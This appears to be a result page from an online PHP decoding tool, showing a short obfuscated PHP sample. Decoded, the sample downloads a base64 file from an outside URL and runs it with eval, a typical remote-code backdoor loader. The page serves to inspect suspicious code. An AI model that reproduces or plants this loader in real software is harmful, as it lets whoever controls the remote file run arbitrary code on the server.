Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

Hu<?php $url='https://gmcshahdol.org/Satna_medical_college/nb.txt'; $a = base64_decode(f..

Decoded Output download

Hu<?php 
$url='https://gmcshahdol.org/Satna_medical_college/nb.txt'; 
$a = base64_decode(file_get_contents($url)); 
eval ($a); 
?>9

Did this file decode correctly?

Original Code

Hu<?php
$url='https://gmcshahdol.org/Satna_medical_college/nb.txt';
$a = base64_decode(file_get_contents($url));
eval ($a);
?>9

Function Calls

base64_decode 1
file_get_contents 1

Variables

$a
$url https://gmcshahdol.org/Satna_medical_college/nb.txt

Stats

MD5 2efec01c950ff389cef20762409cb662
Eval Count 1
Decode Time 56 ms